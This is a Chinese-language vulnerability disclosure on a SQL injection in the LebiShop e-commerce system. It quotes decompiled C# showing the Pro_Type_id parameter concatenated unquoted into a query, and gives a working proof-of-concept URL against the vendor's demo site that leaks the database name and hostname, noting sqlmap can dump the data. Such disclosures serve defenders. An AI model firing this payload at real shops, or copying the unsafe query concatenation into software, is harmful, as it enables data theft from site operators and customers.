LebiShop商城系统最新版SQL注入五

### 简要描述： LebiShop商城系统最新版SQL注入五 ### 详细说明： LebiShop商城系统最新版SQL注入一处 文件Shop.supplier.Ajax.Ajax_product ``` // Shop.supplier.Ajax.Ajax_product public void Product_Batch_Price_Update() { if (!base.Power("supplier_product_batch_price", "批量调价")) { base.AjaxNoPower(); return; } string step = RequestTool.RequestString("step"); string dateFrom = RequestTool.RequestString("dateFrom"); string dateTo = RequestTool.RequestString("dateTo"); string Pro_Type_id = RequestTool.RequestString("Pro_Type_id"); int brand = RequestTool.RequestInt("brand", 0); int tag = RequestTool.RequestInt("tag", 0); int price_markettype = RequestTool.RequestInt("price_markettype", 0); int price_marketvalue = RequestTool.RequestInt("price_marketvalue", 0); int price_marketadd = RequestTool.RequestInt("price_marketadd", 0); int price_costtype = RequestTool.RequestInt("price_costtype", 0); int price_costvalue = RequestTool.RequestInt("price_costvalue", 0); int price_costadd = RequestTool.RequestInt("price_costadd", 0); int pricetype = RequestTool.RequestInt("pricetype", 0); int pricevalue = RequestTool.RequestInt("pricevalue", 0); int priceadd = RequestTool.RequestInt("priceadd", 0); int addtype = RequestTool.RequestInt("addtype", 0); int addvalue = RequestTool.RequestInt("addvalue", 0); int reducetype = RequestTool.RequestInt("reducetype", 0); int reducevalue = RequestTool.RequestInt("reducevalue", 0); string mes = ""; string where = "1=1"; if (dateFrom != "" && dateTo != "") { string text = where; where = string.Concat(new string[] { text, " and (datediff(d,Time_Add,'", dateFrom, "')<=0 and datediff(d,Time_Add,'", dateTo, "')>=0)" }); string text2 = mes; mes = string.Concat(new string[] { text2, "上架日期", dateFrom, "-", dateTo, ";" }); } if (Pro_Type_id != "") { where = where + " and Pro_Type_id in (" + EX_Product.Categoryid(Pro_Type_id) + ")"; mes = mes + "商品分类" + Pro_Type_id + ";"; } ``` 参数Pro_Type_id通过RequestTool.RequestString("Pro_Type_id")获取 在RequestTool.RequestString方法中只进行了单引号的转换 ``` // Shop.Tools.RequestTool public static string RequestString(string nKey, string def) { string ojb = HttpContext.Current.Request.QueryString[nKey]; if (ojb != null) { return StringTool.InjectFiltrate(ojb.Trim()); } ojb = HttpContext.Current.Request.Form[nKey]; if (ojb != null) { return StringTool.InjectFiltrate(ojb.Trim()); } return def; } // Shop.Tools.StringTool public static string InjectFiltrate(string str) { if (!StringTool.IsSafeSqlString(str)) { str = str.Replace("'", "&#180;"); } return str; } ``` 然后Pro_Type_id进入了EX_Product.Categoryid方法，跟进 ``` // Shop.Bussiness.EX_Product public static string Categoryid(string id) { string str = id.ToString(); List<Lebi_Pro_Type> ts = B_Lebi_Pro_Type.GetList("Parentid=" + id + " and IsShow = 1", "Sort desc"); foreach (Lebi_Pro_Type t in ts) { str = str + "," + EX_Product.Categoryid(string.Concat(t.id)); } return str; } ``` 然后Pro_Type_id最后进入了B_Lebi_Pro_Type.GetList方法，且没有使用单引号保护 ### 漏洞证明： 官方demo演示 报出当前数据库 ``` http://plus.demo.lebi.cn/supplier/ajax/ajax_product.aspx?__Action=Product_Batch_Price_Update&url=/ Pro_Type_id=db_name() ``` [<img src="https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png) 报出servername，服务器主机名 [<img src="https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png) sqlmap即可跑出数据